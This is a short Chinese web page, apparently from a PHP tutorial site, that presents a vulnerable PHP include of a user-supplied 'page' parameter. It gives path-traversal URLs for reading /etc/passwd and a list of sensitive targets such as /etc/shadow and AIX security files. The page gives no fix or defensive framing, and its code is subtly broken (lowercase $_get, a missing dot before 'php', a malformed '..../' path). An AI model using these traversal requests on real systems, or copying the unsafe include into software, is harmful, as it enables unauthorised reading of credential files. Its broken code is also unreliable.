代码如下:
php
$page=$_get['page'];
include($page.'php');
?>
你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
0
0
相关文章
php如何判断变量是手机号格式_php手机号格式检测技巧【方法】
php如何生成小程序短链接_php调用短链生成接口【教程】
php分割文本输出为HTML列表_php分割数组转ul列表【技巧】
php创建数据库能在cli下运行吗_php命令行建库教程【步骤】
php如何安全获取数组下标_php防错安全下标法【方案】
相关标签:
本站声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热门AI工具










